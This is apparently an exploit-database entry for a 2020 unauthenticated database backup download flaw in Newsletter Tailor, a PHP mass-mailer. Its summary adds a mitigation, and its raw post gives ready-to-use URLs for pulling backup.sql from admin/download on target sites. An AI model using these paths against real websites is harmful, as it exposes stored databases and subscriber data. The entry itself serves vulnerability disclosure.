Newsletter Tailor Database Backup Dump Vulnerability

vendor:

Newsletter Tailor

by:

ViRuSMaN

7,5

CVSS

HIGH

Database Backup Dump Vulnerability

532

CWE

Product Name: Newsletter Tailor

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Newsletter Tailor Database Backup Dump Vulnerability

A vulnerability exists in Newsletter Tailor, a powerful Newsletter/ Mass Mailer script with built-in ftp client and wysiwyg editor, which allows an attacker to download the database backup from the target website. The vulnerability is due to the lack of authentication and authorization checks in the download.php file, which allows an attacker to download the backup.sql file without any authentication. The attacker can access the backup.sql file by accessing the URL http://[target].com/[path]/admin/download/backup.sql and can download the file by accessing the URL http://[target].com/[path]/admin/download/download.php?file=backup.sql.

Mitigation:

The website should implement authentication and authorization checks for the download.php file to prevent unauthorized access to the backup.sql file.

Source

Exploit-DB raw data:

==============================================================================
[»] ~ Note : [ Tribute to the martyrs of Gaza . ]
==============================================================================
[»] Newsletter Tailor Database Backup Dump Vulnerability
==============================================================================

[»] Script: [ Newsletter Tailor ]
[»] Language: [ PHP ]
[»] Site page: [ A powerful Newsletter/ Mass Mailer script with built-in ftp client and wysiwyg editor ]
[»] Download: [ http://sourceforge.net/projects/nlettertailor/ ]
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploit ]===

[»] http://[target].com/[path]/admin/download/backup.sql <-=- You Can See The backup Code From Here
[»] http://[target].com/[path]/admin/download/download.php?file=backup.sql <-=- You Can Download backup From Here

===[ Live Demo ]===

[»] http://[target].com/[path]/admin/download/backup.sql
[»] http://[target].com/[path]/admin/download/download.php?file=backup.sql

Author: ViRuSMaN <-

###########################################################################